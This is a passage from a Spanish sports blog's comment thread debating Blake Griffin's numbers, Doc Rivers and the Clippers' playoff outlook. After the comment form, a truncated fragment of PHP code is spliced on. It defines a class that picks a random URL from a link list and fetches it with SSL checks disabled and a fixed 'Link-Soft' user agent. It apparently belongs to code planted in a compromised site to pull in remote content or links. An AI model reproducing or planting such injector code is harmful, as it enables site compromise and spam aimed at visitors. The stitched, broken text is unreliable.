    Como diría Mestre… los números son ETA, 🙂 Obviamente, Griffin ha dado un bajón notable en sus números, pero los números no lo son todo. El problema aquí ha sido del entrenador más bien, que no ha sabido hacer nada con los dos grandotes. Esto se debería resolver con Rivers. No obstante, me parece un gran análisis estadístico, basado en números, bien argumentado y riguroso. Además, por sensaciones tampoco da la sensación de ser nada del otro jueves, por lo menos para mí. En estático no puede compararse a muchos de esos jugadores que dice Esteban, y en defensa le falta mucha agresividad. No sé, ética de trabajo sí tiene, y físico también, pero necesita mucha atención por parte de Rivers para desarrollar todo lo que lleva dentro. Podría ser el caso de un jugador que se va desmotivando con el paso de los años y con un entrenador de mierda como siepre me ha parecido Del Negro, y ahora puede ver la luz.

    En el global, tampoco podemos hacernos una idea real de quién es este jugador. Con 25 años no. Cuando tenga 30 entonces sí. Sus circunstancias han sido raras, con la lesión el primer año y los caídas estrepitosas en playoffs. Pero este es un año nuevo y yo sí que pienso que tanto Griffin como Jordan van a dar un paso adelante por fin.

    En lo personal, felicitarte por este artículo, no tanto por el del análisis de los Clippers, porque tiraste demasiado de instinto sin pararte a analizar fríamente la aportación de los nuevos jugadores. Clippers serán un hueso del Oeste al nivel de Oklahoma, Spus, Grizzlies, Rockets o Warriors. Enterrarlos en primera ronda como hiciste en el análisis no tiene sentido. Al menos llegarán a semifinales sin problemas, y una vez allí ya sabemos que todo puede pasar. Confía en Rivers que te va a dar más alegrías de las que te piensas…

      Citar

  41. jonnyy dice:
    #41

    Viene bien rescatar este articulo un día como hoy

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>